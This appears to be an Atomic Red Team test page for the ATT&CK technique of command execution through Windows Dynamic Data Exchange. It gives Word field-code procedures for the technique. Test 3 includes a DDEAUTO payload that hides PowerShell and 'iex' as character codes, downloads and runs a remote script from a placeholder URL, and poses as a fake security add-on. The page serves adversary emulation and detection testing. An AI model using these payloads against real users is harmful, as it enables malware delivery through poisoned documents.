T1559.002 - Inter-Process Communication: Dynamic Data Exchange

Description from ATT&CK

Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by [Component Object Model](https://attack.mitre.org/techniques/T1559/001), DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys.(Citation: BleepingComputer DDE Disabled in Word Dec 2017)(Citation: Microsoft ADV170021 Dec 2017)(Citation: Microsoft DDE Advisory Nov 2017) Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros.(Citation: SensePost PS DDE May 2016)(Citation: Kettle CSV DDE Aug 2014)(Citation: Enigma Reviving DDE Jan 2018)(Citation: SensePost MacroLess DDE Oct 2017) Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program.(Citation: OWASP CSV Injection)(Citation: CSV Excel Macro Injection ) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). DDE execution can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)

Atomic Tests

Atomic Test #1 - Execute Commands

Executes commands via DDE using Microsfot Word

Supported Platforms: Windows

auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd

Run it with these steps!

Open Microsoft Word

Insert tab -> Quick Parts -> Field

Choose = (Formula) and click ok.

After that, you should see a Field inserted in the document with an error “!Unexpected End of Formula”, right-click the Field, and choose Toggle Field Codes.

The Field Code should now be displayed, change it to Contain the following:

{DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe” }

Atomic Test #2 - Execute PowerShell script via Word DDE

When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script

Supported Platforms: Windows

auto_generated_guid: 47c21fb6-085e-4b0d-b4d2-26d72c3830b3

Attack Commands: Run with

start "$PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx"

Atomic Test #3 - DDEAUTO

TrustedSec - Unicorn - https://github.com/trustedsec/unicorn

SensePost DDEAUTO - https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

Word VBA Macro

Dragon’s Tail

Supported Platforms: Windows

auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181

Run it with these steps!

  1. Open Word

  2. Insert tab -> Quick Parts -> Field

  3. Choose = (Formula) and click ok.

  4. Once the field is inserted, you should now see “!Unexpected End of Formula”

  5. Right-click the Field, choose “Toggle Field Codes”

  6. Paste in the code from Unicorn or SensePost

  7. Save the Word document.

  8. DDEAUTO c:\windows\system32\cmd.exe “/k calc.exe”

  9. DDEAUTO “C:\Programs\Microsoft\Office\MSWord\..\..\..\..\windows\system32\{ QUOTE 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 }\v1.0\{ QUOTE 112 111 119 101 114 115 104 101 108 108 46 101 120 101 } -w 1 -nop { QUOTE 105 101 120 }(New-Object System.Net.WebClient).DownloadString(‘http:///download.ps1'); # " "Microsoft Document Security Add-On"